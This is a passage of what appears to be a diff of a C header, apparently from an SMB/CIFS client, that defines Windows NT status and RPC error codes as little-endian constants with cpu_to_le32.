+-#define STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED cpu_to_le32(0xC00002E7)
+-#define STATUS_MULTIPLE_FAULT_VIOLATION cpu_to_le32(0xC00002E8)
+-#define STATUS_CURRENT_DOMAIN_NOT_ALLOWED cpu_to_le32(0xC00002E9)
+-#define STATUS_CANNOT_MAKE cpu_to_le32(0xC00002EA)
+-#define STATUS_SYSTEM_SHUTDOWN cpu_to_le32(0xC00002EB)
+-#define STATUS_DS_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002EC)
+-#define STATUS_DS_SAM_INIT_FAILURE_CONSOLE cpu_to_le32(0xC00002ED)
+-#define STATUS_UNFINISHED_CONTEXT_DELETED cpu_to_le32(0xC00002EE)
+-#define STATUS_NO_TGT_REPLY cpu_to_le32(0xC00002EF)
+-#define STATUS_OBJECTID_NOT_FOUND cpu_to_le32(0xC00002F0)
+-#define STATUS_NO_IP_ADDRESSES cpu_to_le32(0xC00002F1)
+-#define STATUS_WRONG_CREDENTIAL_HANDLE cpu_to_le32(0xC00002F2)
+-#define STATUS_CRYPTO_SYSTEM_INVALID cpu_to_le32(0xC00002F3)
+-#define STATUS_MAX_REFERRALS_EXCEEDED cpu_to_le32(0xC00002F4)
+-#define STATUS_MUST_BE_KDC cpu_to_le32(0xC00002F5)
+-#define STATUS_STRONG_CRYPTO_NOT_SUPPORTED cpu_to_le32(0xC00002F6)
+-#define STATUS_TOO_MANY_PRINCIPALS cpu_to_le32(0xC00002F7)
+-#define STATUS_NO_PA_DATA cpu_to_le32(0xC00002F8)
+-#define STATUS_PKINIT_NAME_MISMATCH cpu_to_le32(0xC00002F9)
+-#define STATUS_SMARTCARD_LOGON_REQUIRED cpu_to_le32(0xC00002FA)
+-#define STATUS_KDC_INVALID_REQUEST cpu_to_le32(0xC00002FB)
+-#define STATUS_KDC_UNABLE_TO_REFER cpu_to_le32(0xC00002FC)
+-#define STATUS_KDC_UNKNOWN_ETYPE cpu_to_le32(0xC00002FD)
+-#define STATUS_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FE)
+-#define STATUS_SERVER_SHUTDOWN_IN_PROGRESS cpu_to_le32(0xC00002FF)
+-#define STATUS_NOT_SUPPORTED_ON_SBS cpu_to_le32(0xC0000300)
+-#define STATUS_WMI_GUID_DISCONNECTED cpu_to_le32(0xC0000301)
+-#define STATUS_WMI_ALREADY_DISABLED cpu_to_le32(0xC0000302)
+-#define STATUS_WMI_ALREADY_ENABLED cpu_to_le32(0xC0000303)
+-#define STATUS_MFT_TOO_FRAGMENTED cpu_to_le32(0xC0000304)
+-#define STATUS_COPY_PROTECTION_FAILURE cpu_to_le32(0xC0000305)
+-#define STATUS_CSS_AUTHENTICATION_FAILURE cpu_to_le32(0xC0000306)
+-#define STATUS_CSS_KEY_NOT_PRESENT cpu_to_le32(0xC0000307)
+-#define STATUS_CSS_KEY_NOT_ESTABLISHED cpu_to_le32(0xC0000308)
+-#define STATUS_CSS_SCRAMBLED_SECTOR cpu_to_le32(0xC0000309)
+-#define STATUS_CSS_REGION_MISMATCH cpu_to_le32(0xC000030A)
+-#define STATUS_CSS_RESETS_EXHAUSTED cpu_to_le32(0xC000030B)
+-#define STATUS_PKINIT_FAILURE cpu_to_le32(0xC0000320)
+-#define STATUS_SMARTCARD_SUBSYSTEM_FAILURE cpu_to_le32(0xC0000321)
+-#define STATUS_NO_KERB_KEY cpu_to_le32(0xC0000322)
+-#define STATUS_HOST_DOWN cpu_to_le32(0xC0000350)
+-#define STATUS_UNSUPPORTED_PREAUTH cpu_to_le32(0xC0000351)
+-#define STATUS_EFS_ALG_BLOB_TOO_BIG cpu_to_le32(0xC0000352)
+-#define STATUS_PORT_NOT_SET cpu_to_le32(0xC0000353)
+-#define STATUS_DEBUGGER_INACTIVE cpu_to_le32(0xC0000354)
+-#define STATUS_DS_VERSION_CHECK_FAILURE cpu_to_le32(0xC0000355)
+-#define STATUS_AUDITING_DISABLED cpu_to_le32(0xC0000356)
+-#define STATUS_PRENT4_MACHINE_ACCOUNT cpu_to_le32(0xC0000357)
+-#define STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER cpu_to_le32(0xC0000358)
+-#define STATUS_INVALID_IMAGE_WIN_32 cpu_to_le32(0xC0000359)
+-#define STATUS_INVALID_IMAGE_WIN_64 cpu_to_le32(0xC000035A)
+-#define STATUS_BAD_BINDINGS cpu_to_le32(0xC000035B)
+-#define STATUS_NETWORK_SESSION_EXPIRED cpu_to_le32(0xC000035C)
+-#define STATUS_APPHELP_BLOCK cpu_to_le32(0xC000035D)
+-#define STATUS_ALL_SIDS_FILTERED cpu_to_le32(0xC000035E)
+-#define STATUS_NOT_SAFE_MODE_DRIVER cpu_to_le32(0xC000035F)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT cpu_to_le32(0xC0000361)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_PATH cpu_to_le32(0xC0000362)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER cpu_to_le32(0xC0000363)
+-#define STATUS_ACCESS_DISABLED_BY_POLICY_OTHER cpu_to_le32(0xC0000364)
+-#define STATUS_FAILED_DRIVER_ENTRY cpu_to_le32(0xC0000365)
+-#define STATUS_DEVICE_ENUMERATION_ERROR cpu_to_le32(0xC0000366)
+-#define STATUS_MOUNT_POINT_NOT_RESOLVED cpu_to_le32(0xC0000368)
+-#define STATUS_INVALID_DEVICE_OBJECT_PARAMETER cpu_to_le32(0xC0000369)
+-#define STATUS_MCA_OCCURED cpu_to_le32(0xC000036A)
+-#define STATUS_DRIVER_BLOCKED_CRITICAL cpu_to_le32(0xC000036B)
+-#define STATUS_DRIVER_BLOCKED cpu_to_le32(0xC000036C)
+-#define STATUS_DRIVER_DATABASE_ERROR cpu_to_le32(0xC000036D)
+-#define STATUS_SYSTEM_HIVE_TOO_LARGE cpu_to_le32(0xC000036E)
+-#define STATUS_INVALID_IMPORT_OF_NON_DLL cpu_to_le32(0xC000036F)
+-#define STATUS_NO_SECRETS cpu_to_le32(0xC0000371)
+-#define STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY cpu_to_le32(0xC0000372)
+-#define STATUS_FAILED_STACK_SWITCH cpu_to_le32(0xC0000373)
+-#define STATUS_HEAP_CORRUPTION cpu_to_le32(0xC0000374)
+-#define STATUS_SMARTCARD_WRONG_PIN cpu_to_le32(0xC0000380)
+-#define STATUS_SMARTCARD_CARD_BLOCKED cpu_to_le32(0xC0000381)
+-#define STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED cpu_to_le32(0xC0000382)
+-#define STATUS_SMARTCARD_NO_CARD cpu_to_le32(0xC0000383)
+-#define STATUS_SMARTCARD_NO_KEY_CONTAINER cpu_to_le32(0xC0000384)
+-#define STATUS_SMARTCARD_NO_CERTIFICATE cpu_to_le32(0xC0000385)
+-#define STATUS_SMARTCARD_NO_KEYSET cpu_to_le32(0xC0000386)
+-#define STATUS_SMARTCARD_IO_ERROR cpu_to_le32(0xC0000387)
+-#define STATUS_DOWNGRADE_DETECTED cpu_to_le32(0xC0000388)
+-#define STATUS_SMARTCARD_CERT_REVOKED cpu_to_le32(0xC0000389)
+-#define STATUS_ISSUING_CA_UNTRUSTED cpu_to_le32(0xC000038A)
+-#define STATUS_REVOCATION_OFFLINE_C cpu_to_le32(0xC000038B)
+-#define STATUS_PKINIT_CLIENT_FAILURE cpu_to_le32(0xC000038C)
+-#define STATUS_SMARTCARD_CERT_EXPIRED cpu_to_le32(0xC000038D)
+-#define STATUS_DRIVER_FAILED_PRIOR_UNLOAD cpu_to_le32(0xC000038E)
+-#define STATUS_SMARTCARD_SILENT_CONTEXT cpu_to_le32(0xC000038F)
+-#define STATUS_PER_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000401)
+-#define STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000402)
+-#define STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000403)
+-#define STATUS_DS_NAME_NOT_UNIQUE cpu_to_le32(0xC0000404)
+-#define STATUS_DS_DUPLICATE_ID_FOUND cpu_to_le32(0xC0000405)
+-#define STATUS_DS_GROUP_CONVERSION_ERROR cpu_to_le32(0xC0000406)
+-#define STATUS_VOLSNAP_PREPARE_HIBERNATE cpu_to_le32(0xC0000407)
+-#define STATUS_USER2USER_REQUIRED cpu_to_le32(0xC0000408)
+-#define STATUS_STACK_BUFFER_OVERRUN cpu_to_le32(0xC0000409)
+-#define STATUS_NO_S4U_PROT_SUPPORT cpu_to_le32(0xC000040A)
+-#define STATUS_CROSSREALM_DELEGATION_FAILURE cpu_to_le32(0xC000040B)
+-#define STATUS_REVOCATION_OFFLINE_KDC cpu_to_le32(0xC000040C)
+-#define STATUS_ISSUING_CA_UNTRUSTED_KDC cpu_to_le32(0xC000040D)
+-#define STATUS_KDC_CERT_EXPIRED cpu_to_le32(0xC000040E)
+-#define STATUS_KDC_CERT_REVOKED cpu_to_le32(0xC000040F)
+-#define STATUS_PARAMETER_QUOTA_EXCEEDED cpu_to_le32(0xC0000410)
+-#define STATUS_HIBERNATION_FAILURE cpu_to_le32(0xC0000411)
+-#define STATUS_DELAY_LOAD_FAILED cpu_to_le32(0xC0000412)
+-#define STATUS_AUTHENTICATION_FIREWALL_FAILED cpu_to_le32(0xC0000413)
+-#define STATUS_VDM_DISALLOWED cpu_to_le32(0xC0000414)
+-#define STATUS_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC0000415)
+-#define STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE cpu_to_le32(0xC0000416)
+-#define STATUS_INVALID_CRUNTIME_PARAMETER cpu_to_le32(0xC0000417)
+-#define STATUS_NTLM_BLOCKED cpu_to_le32(0xC0000418)
+-#define STATUS_ASSERTION_FAILURE cpu_to_le32(0xC0000420)
+-#define STATUS_VERIFIER_STOP cpu_to_le32(0xC0000421)
+-#define STATUS_CALLBACK_POP_STACK cpu_to_le32(0xC0000423)
+-#define STATUS_INCOMPATIBLE_DRIVER_BLOCKED cpu_to_le32(0xC0000424)
+-#define STATUS_HIVE_UNLOADED cpu_to_le32(0xC0000425)
+-#define STATUS_COMPRESSION_DISABLED cpu_to_le32(0xC0000426)
+-#define STATUS_FILE_SYSTEM_LIMITATION cpu_to_le32(0xC0000427)
+-#define STATUS_INVALID_IMAGE_HASH cpu_to_le32(0xC0000428)
+-#define STATUS_NOT_CAPABLE cpu_to_le32(0xC0000429)
+-#define STATUS_REQUEST_OUT_OF_SEQUENCE cpu_to_le32(0xC000042A)
+-#define STATUS_IMPLEMENTATION_LIMIT cpu_to_le32(0xC000042B)
+-#define STATUS_ELEVATION_REQUIRED cpu_to_le32(0xC000042C)
+-#define STATUS_BEYOND_VDL cpu_to_le32(0xC0000432)
+-#define STATUS_ENCOUNTERED_WRITE_IN_PROGRESS cpu_to_le32(0xC0000433)
+-#define STATUS_PTE_CHANGED cpu_to_le32(0xC0000434)
+-#define STATUS_PURGE_FAILED cpu_to_le32(0xC0000435)
+-#define STATUS_CRED_REQUIRES_CONFIRMATION cpu_to_le32(0xC0000440)
+-#define STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE cpu_to_le32(0xC0000441)
+-#define STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER cpu_to_le32(0xC0000442)
+-#define STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE cpu_to_le32(0xC0000443)
+-#define STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE cpu_to_le32(0xC0000444)
+-#define STATUS_CS_ENCRYPTION_FILE_NOT_CSE cpu_to_le32(0xC0000445)
+-#define STATUS_INVALID_LABEL cpu_to_le32(0xC0000446)
+-#define STATUS_DRIVER_PROCESS_TERMINATED cpu_to_le32(0xC0000450)
+-#define STATUS_AMBIGUOUS_SYSTEM_DEVICE cpu_to_le32(0xC0000451)
+-#define STATUS_SYSTEM_DEVICE_NOT_FOUND cpu_to_le32(0xC0000452)
+-#define STATUS_RESTART_BOOT_APPLICATION cpu_to_le32(0xC0000453)
+-#define STATUS_INVALID_TASK_NAME cpu_to_le32(0xC0000500)
+-#define STATUS_INVALID_TASK_INDEX cpu_to_le32(0xC0000501)
+-#define STATUS_THREAD_ALREADY_IN_TASK cpu_to_le32(0xC0000502)
+-#define STATUS_CALLBACK_BYPASS cpu_to_le32(0xC0000503)
+-#define STATUS_PORT_CLOSED cpu_to_le32(0xC0000700)
+-#define STATUS_MESSAGE_LOST cpu_to_le32(0xC0000701)
+-#define STATUS_INVALID_MESSAGE cpu_to_le32(0xC0000702)
+-#define STATUS_REQUEST_CANCELED cpu_to_le32(0xC0000703)
+-#define STATUS_RECURSIVE_DISPATCH cpu_to_le32(0xC0000704)
+-#define STATUS_LPC_RECEIVE_BUFFER_EXPECTED cpu_to_le32(0xC0000705)
+-#define STATUS_LPC_INVALID_CONNECTION_USAGE cpu_to_le32(0xC0000706)
+-#define STATUS_LPC_REQUESTS_NOT_ALLOWED cpu_to_le32(0xC0000707)
+-#define STATUS_RESOURCE_IN_USE cpu_to_le32(0xC0000708)
+-#define STATUS_HARDWARE_MEMORY_ERROR cpu_to_le32(0xC0000709)
+-#define STATUS_THREADPOOL_HANDLE_EXCEPTION cpu_to_le32(0xC000070A)
+-#define STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED cpu_to_le32(0xC000070B)
+-#define STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED cpu_to_le32(0xC000070C)
+-#define STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED cpu_to_le32(0xC000070D)
+-#define STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED cpu_to_le32(0xC000070E)
+-#define STATUS_THREADPOOL_RELEASED_DURING_OPERATION cpu_to_le32(0xC000070F)
+-#define STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000710)
+-#define STATUS_APC_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000711)
+-#define STATUS_PROCESS_IS_PROTECTED cpu_to_le32(0xC0000712)
+-#define STATUS_MCA_EXCEPTION cpu_to_le32(0xC0000713)
+-#define STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE cpu_to_le32(0xC0000714)
+-#define STATUS_SYMLINK_CLASS_DISABLED cpu_to_le32(0xC0000715)
+-#define STATUS_INVALID_IDN_NORMALIZATION cpu_to_le32(0xC0000716)
+-#define STATUS_NO_UNICODE_TRANSLATION cpu_to_le32(0xC0000717)
+-#define STATUS_ALREADY_REGISTERED cpu_to_le32(0xC0000718)
+-#define STATUS_CONTEXT_MISMATCH cpu_to_le32(0xC0000719)
+-#define STATUS_PORT_ALREADY_HAS_COMPLETION_LIST cpu_to_le32(0xC000071A)
+-#define STATUS_CALLBACK_RETURNED_THREAD_PRIORITY cpu_to_le32(0xC000071B)
+-#define STATUS_INVALID_THREAD cpu_to_le32(0xC000071C)
+-#define STATUS_CALLBACK_RETURNED_TRANSACTION cpu_to_le32(0xC000071D)
+-#define STATUS_CALLBACK_RETURNED_LDR_LOCK cpu_to_le32(0xC000071E)
+-#define STATUS_CALLBACK_RETURNED_LANG cpu_to_le32(0xC000071F)
+-#define STATUS_CALLBACK_RETURNED_PRI_BACK cpu_to_le32(0xC0000720)
+-#define STATUS_CALLBACK_RETURNED_THREAD_AFFINITY cpu_to_le32(0xC0000721)
+-#define STATUS_DISK_REPAIR_DISABLED cpu_to_le32(0xC0000800)
+-#define STATUS_DS_DOMAIN_RENAME_IN_PROGRESS cpu_to_le32(0xC0000801)
+-#define STATUS_DISK_QUOTA_EXCEEDED cpu_to_le32(0xC0000802)
+-#define STATUS_CONTENT_BLOCKED cpu_to_le32(0xC0000804)
+-#define STATUS_BAD_CLUSTERS cpu_to_le32(0xC0000805)
+-#define STATUS_VOLUME_DIRTY cpu_to_le32(0xC0000806)
+-#define STATUS_FILE_CHECKED_OUT cpu_to_le32(0xC0000901)
+-#define STATUS_CHECKOUT_REQUIRED cpu_to_le32(0xC0000902)
+-#define STATUS_BAD_FILE_TYPE cpu_to_le32(0xC0000903)
+-#define STATUS_FILE_TOO_LARGE cpu_to_le32(0xC0000904)
+-#define STATUS_FORMS_AUTH_REQUIRED cpu_to_le32(0xC0000905)
+-#define STATUS_VIRUS_INFECTED cpu_to_le32(0xC0000906)
+-#define STATUS_VIRUS_DELETED cpu_to_le32(0xC0000907)
+-#define STATUS_BAD_MCFG_TABLE cpu_to_le32(0xC0000908)
+-#define STATUS_WOW_ASSERTION cpu_to_le32(0xC0009898)
+-#define STATUS_INVALID_SIGNATURE cpu_to_le32(0xC000A000)
+-#define STATUS_HMAC_NOT_SUPPORTED cpu_to_le32(0xC000A001)
+-#define STATUS_IPSEC_QUEUE_OVERFLOW cpu_to_le32(0xC000A010)
+-#define STATUS_ND_QUEUE_OVERFLOW cpu_to_le32(0xC000A011)
+-#define STATUS_HOPLIMIT_EXCEEDED cpu_to_le32(0xC000A012)
+-#define STATUS_PROTOCOL_NOT_SUPPORTED cpu_to_le32(0xC000A013)
+-#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED cpu_to_le32(0xC000A080)
+-#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR cpu_to_le32(0xC000A081)
+-#define STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR cpu_to_le32(0xC000A082)
+-#define STATUS_XML_PARSE_ERROR cpu_to_le32(0xC000A083)
+-#define STATUS_XMLDSIG_ERROR cpu_to_le32(0xC000A084)
+-#define STATUS_WRONG_COMPARTMENT cpu_to_le32(0xC000A085)
+-#define STATUS_AUTHIP_FAILURE cpu_to_le32(0xC000A086)
+-#define DBG_NO_STATE_CHANGE cpu_to_le32(0xC0010001)
+-#define DBG_APP_NOT_IDLE cpu_to_le32(0xC0010002)
+-#define RPC_NT_INVALID_STRING_BINDING cpu_to_le32(0xC0020001)
+-#define RPC_NT_WRONG_KIND_OF_BINDING cpu_to_le32(0xC0020002)
+-#define RPC_NT_INVALID_BINDING cpu_to_le32(0xC0020003)
+-#define RPC_NT_PROTSEQ_NOT_SUPPORTED cpu_to_le32(0xC0020004)
+-#define RPC_NT_INVALID_RPC_PROTSEQ cpu_to_le32(0xC0020005)
+-#define RPC_NT_INVALID_STRING_UUID cpu_to_le32(0xC0020006)
+-#define RPC_NT_INVALID_ENDPOINT_FORMAT cpu_to_le32(0xC0020007)
+-#define RPC_NT_INVALID_NET_ADDR cpu_to_le32(0xC0020008)
+-#define RPC_NT_NO_ENDPOINT_FOUND cpu_to_le32(0xC0020009)
+-#define RPC_NT_INVALID_TIMEOUT cpu_to_le32(0xC002000A)
+-#define RPC_NT_OBJECT_NOT_FOUND cpu_to_le32(0xC002000B)
+-#define RPC_NT_ALREADY_REGISTERED cpu_to_le32(0xC002000C)
+-#define RPC_NT_TYPE_ALREADY_REGISTERED cpu_to_le32(0xC002000D)
+-#define RPC_NT_ALREADY_LISTENING cpu_to_le32(0xC002000E)
+-#define RPC_NT_NO_PROTSEQS_REGISTERED cpu_to_le32(0xC002000F)
+-#define RPC_NT_NOT_LISTENING cpu_to_le32(0xC0020010)
+-#define RPC_NT_UNKNOWN_MGR_TYPE cpu_to_le32(0xC0020011)
+-#define RPC_NT_UNKNOWN_IF cpu_to_le32(0xC0020012)
+-#define RPC_NT_NO_BINDINGS cpu_to_le32(0xC0020013)
+-#define RPC_NT_NO_PROTSEQS cpu_to_le32(0xC0020014)
+-#define RPC_NT_CANT_CREATE_ENDPOINT cpu_to_le32(0xC0020015)
+-#define RPC_NT_OUT_OF_RESOURCES cpu_to_le32(0xC0020016)
+-#define RPC_NT_SERVER_UNAVAILABLE cpu_to_le32(0xC0020017)
+-#define RPC_NT_SERVER_TOO_BUSY cpu_to_le32(0xC0020018)
+-#define RPC_NT_INVALID_NETWORK_OPTIONS cpu_to_le32(0xC0020019)
+-#define RPC_NT_NO_CALL_ACTIVE cpu_to_le32(0xC002001A)
+-#define RPC_NT_CALL_FAILED cpu_to_le32(0xC002001B)
+-#define RPC_NT_CALL_FAILED_DNE cpu_to_le32(0xC002001C)
+-#define RPC_NT_PROTOCOL_ERROR cpu_to_le32(0xC002001D)
+-#define RPC_NT_UNSUPPORTED_TRANS_SYN cpu_to_le32(0xC002001F)
+-#define RPC_NT_UNSUPPORTED_TYPE cpu_to_le32(0xC0020021)
+-#define RPC_NT_INVALID_TAG cpu_to_le32(0xC0020022)
+-#define RPC_NT_INVALID_BOUND cpu_to_le32(0xC0020023)
+-#define RPC_NT_NO_ENTRY_NAME cpu_to_le32(0xC0020024)
+-#define RPC_NT_INVALID_NAME_SYNTAX cpu_to_le32(0xC0020025)
+-#define RPC_NT_UNSUPPORTED_NAME_SYNTAX cpu_to_le32(0xC0020026)
+-#define RPC_NT_UUID_NO_ADDRESS cpu_to_le32(0xC0020028)
+-#define RPC_NT_DUPLICATE_ENDPOINT cpu_to_le32(0xC0020029)
+-#define RPC_NT_UNKNOWN_AUTHN_TYPE cpu_to_le32(0xC002002A)
+-#define RPC_NT_MAX_CALLS_TOO_SMALL cpu_to_le32(0xC002002B)
+-#define RPC_NT_STRING_TOO_LONG cpu_to_le32(0xC002002C)
+-#define RPC_NT_PROTSEQ_NOT_FOUND cpu_to_le32(0xC002002D)
+-#define RPC_NT_PROCNUM_OUT_OF_RANGE cpu_to_le32(0xC002002E)
+-#define RPC_NT_BINDING_HAS_NO_AUTH cpu_to_le32(0xC002002F)
+-#define RPC_NT_UNKNOWN_AUTHN_SERVICE cpu_to_le32(0xC0020030)
+-#define RPC_NT_UNKNOWN_AUTHN_LEVEL cpu_to_le32(0xC0020031)
+-#define RPC_NT_INVALID_AUTH_IDENTITY cpu_to_le32(0xC0020032)
+-#define RPC_NT_UNKNOWN_AUTHZ_SERVICE cpu_to_le32(0xC0020033)
+-#define EPT_NT_INVALID_ENTRY cpu_to_le32(0xC0020034)
+-#define EPT_NT_CANT_PERFORM_OP cpu_to_le32(0xC0020035)
+-#define EPT_NT_NOT_REGISTERED cpu_to_le32(0xC0020036)
+-#define RPC_NT_NOTHING_TO_EXPORT cpu_to_le32(0xC0020037)
+-#define RPC_NT_INCOMPLETE_NAME cpu_to_le32(0xC0020038)
+-#define RPC_NT_INVALID_VERS_OPTION cpu_to_le32(0xC0020039)
+-#define RPC_NT_NO_MORE_MEMBERS cpu_to_le32(0xC002003A)
+-#define RPC_NT_NOT_ALL_OBJS_UNEXPORTED cpu_to_le32(0xC002003B)
+-#define RPC_NT_INTERFACE_NOT_FOUND cpu_to_le32(0xC002003C)
+-#define RPC_NT_ENTRY_ALREADY_EXISTS cpu_to_le32(0xC002003D)
+-#define RPC_NT_ENTRY_NOT_FOUND cpu_to_le32(0xC002003E)
+-#define RPC_NT_NAME_SERVICE_UNAVAILABLE cpu_to_le32(0xC002003F)
+-#define RPC_NT_INVALID_NAF_ID cpu_to_le32(0xC0020040)
+-#define RPC_NT_CANNOT_SUPPORT cpu_to_le32(0xC0020041)
+-#define RPC_NT_NO_CONTEXT_AVAILABLE cpu_to_le32(0xC0020042)
+-#define RPC_NT_INTERNAL_ERROR cpu_to_le32(0xC0020043)
+-#define RPC_NT_ZERO_DIVIDE cpu_to_le32(0xC0020044)
+-#define RPC_NT_ADDRESS_ERROR cpu_to_le32(0xC0020045)
+-#define RPC_NT_FP_DIV_ZERO cpu_to_le32(0xC0020046)
+-#define RPC_NT_FP_UNDERFLOW cpu_to_le32(0xC0020047)
+-#define RPC_NT_FP_OVERFLOW cpu_to_le32(0xC0020048)
+-#define RPC_NT_CALL_IN_PROGRESS cpu_to_le32(0xC0020049)
+-#define RPC_NT_NO_MORE_BINDINGS cpu_to_le32(0xC002004A)
+-#define RPC_NT_GROUP_MEMBER_NOT_FOUND cpu_to_le32(0xC002004B)
+-#define EPT_NT_CANT_CREATE cpu_to_le32(0xC002004C)
+-#define RPC_NT_INVALID_OBJECT cpu_to_le32(0xC002004D)
+-#define RPC_NT_NO_INTERFACES cpu_to_le32(0xC002004F)
+-#define RPC_NT_CALL_CANCELLED cpu_to_le32(0xC0020050)
+-#define RPC_NT_BINDING_INCOMPLETE cpu_to_le32(0xC0020051)
+-#define RPC_NT_COMM_FAILURE cpu_to_le32(0xC0020052)
+-#define RPC_NT_UNSUPPORTED_AUTHN_LEVEL cpu_to_le32(0xC0020053)
+-#define RPC_NT_NO_PRINC_NAME cpu_to_le32(0xC0020054)
+-#define RPC_NT_NOT_RPC_ERROR cpu_to_le32(0xC0020055)
+-#define RPC_NT_SEC_PKG_ERROR cpu_to_le32(0xC0020057)
+-#define RPC_NT_NOT_CANCELLED cpu_to_le32(0xC0020058)
+-#define RPC_NT_INVALID_ASYNC_HANDLE cpu_to_le32(0xC0020062)
+-#define RPC_NT_INVALID_ASYNC_CALL cpu_to_le32(0xC0020063)
+-#define RPC_NT_PROXY_ACCESS_DENIED cpu_to_le32(0xC0020064)
+-#define RPC_NT_NO_MORE_ENTRIES cpu_to_le32(0xC0030001)
+-#define RPC_NT_SS_CHAR_TRANS_OPEN_FAIL cpu_to_le32(0xC0030002)
+-#define RPC_NT_SS_CHAR_TRANS_SHORT_FILE cpu_to_le32(0xC0030003)
+-#define RPC_NT_SS_IN_NULL_CONTEXT cpu_to_le32(0xC0030004)
+-#define RPC_NT_SS_CONTEXT_MISMATCH cpu_to_le32(0xC0030005)
+-#define RPC_NT_SS_CONTEXT_DAMAGED cpu_to_le32(0xC0030006)
+-#define RPC_NT_SS_HANDLES_MISMATCH cpu_to_le32(0xC0030007)
+-#define RPC_NT_SS_CANNOT_GET_CALL_HANDLE cpu_to_le32(0xC0030008)
+-#define RPC_NT_NULL_REF_POINTER cpu_to_le32(0xC0030009)
+-#define RPC_NT_ENUM_VALUE_OUT_OF_RANGE cpu_to_le32(0xC003000A)
+-#define RPC_NT_BYTE_COUNT_TOO_SMALL cpu_to_le32(0xC003000B)
+-#define RPC_NT_BAD_STUB_DATA cpu_to_le32(0xC003000C)
+-#define RPC_NT_INVALID_ES_ACTION cpu_to_le32(0xC0030059)
+-#define RPC_NT_WRONG_ES_VERSION cpu_to_le32(0xC003005A)
+-#define RPC_NT_WRONG_STUB_VERSION cpu_to_le32(0xC003005B)
+-#define RPC_NT_INVALID_PIPE_OBJECT cpu_to_le32(0xC003005C)
+-#define RPC_NT_INVALID_PIPE_OPERATION cpu_to_le32(0xC003005D)
+-#define RPC_NT_WRONG_PIPE_VERSION cpu_to_le32(0xC003005E)
+-#define RPC_NT_PIPE_CLOSED cpu_to_le32(0xC003005F)
+-#define RPC_NT_PIPE_DISCIPLINE_ERROR cpu_to_le32(0xC0030060)
+-#define RPC_NT_PIPE_EMPTY cpu_to_le32(0xC0030061)
+-#define STATUS_PNP_BAD_MPS_TABLE cpu_to_le32(0xC0040035)
+-#define STATUS_PNP_TRANSLATION_FAILED cpu_to_le32(0xC0040036)
+-#define STATUS_PNP_IRQ_TRANSLATION_FAILED cpu_to_le32(0xC0040037)
+-#define STATUS_PNP_INVALID_ID cpu_to_le32(0xC0040038)
+-#define STATUS_IO_REISSUE_AS_CACHED cpu_to_le32(0xC0040039)
+-#define STATUS_CTX_WINSTATION_NAME_INVALID cpu_to_le32(0xC00A0001)
+-#define STATUS_CTX_INVALID_PD cpu_to_le32(0xC00A0002)
+-#define STATUS_CTX_PD_NOT_FOUND cpu_to_le32(0xC00A0003)
+-#define STATUS_CTX_CLOSE_PENDING cpu_to_le32(0xC00A0006)
+-#define STATUS_CTX_NO_OUTBUF cpu_to_le32(0xC00A0007)
+-#define STATUS_CTX_MODEM_INF_NOT_FOUND cpu_to_le32(0xC00A0008)
+-#define STATUS_CTX_INVALID_MODEMNAME cpu_to_le32(0xC00A0009)
+-#define STATUS_CTX_RESPONSE_ERROR cpu_to_le32(0xC00A000A)
+-#define STATUS_CTX_MODEM_RESPONSE_TIMEOUT cpu_to_le32(0xC00A000B)
+-#define STATUS_CTX_MODEM_RESPONSE_NO_CARRIER cpu_to_le32(0xC00A000C)
+-#define STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE cpu_to_le32(0xC00A000D)
+-#define STATUS_CTX_MODEM_RESPONSE_BUSY cpu_to_le32(0xC00A000E)
+-#define STATUS_CTX_MODEM_RESPONSE_VOICE cpu_to_le32(0xC00A000F)
+-#define STATUS_CTX_TD_ERROR cpu_to_le32(0xC00A0010)
+-#define STATUS_CTX_LICENSE_CLIENT_INVALID cpu_to_le32(0xC00A0012)
+-#define STATUS_CTX_LICENSE_NOT_AVAILABLE cpu_to_le32(0xC00A0013)
+-#define STATUS_CTX_LICENSE_EXPIRED cpu_to_le32(0xC00A0014)
+-#define STATUS_CTX_WINSTATION_NOT_FOUND cpu_to_le32(0xC00A0015)
+-#define STATUS_CTX_WINSTATION_NAME_COLLISION cpu_to_le32(0xC00A0016)
+-#define STATUS_CTX_WINSTATION_BUSY cpu_to_le32(0xC00A0017)
+-#define STATUS_CTX_BAD_VIDEO_MODE cpu_to_le32(0xC00A0018)
+-#define STATUS_CTX_GRAPHICS_INVALID cpu_to_le32(0xC00A0022)
+-#define STATUS_CTX_NOT_CONSOLE cpu_to_le32(0xC00A0024)
+-#define STATUS_CTX_CLIENT_QUERY_TIMEOUT cpu_to_le32(0xC00A0026)
+-#define STATUS_CTX_CONSOLE_DISCONNECT cpu_to_le32(0xC00A0027)
+-#define STATUS_CTX_CONSOLE_CONNECT cpu_to_le32(0xC00A0028)
+-#define STATUS_CTX_SHADOW_DENIED cpu_to_le32(0xC00A002A)
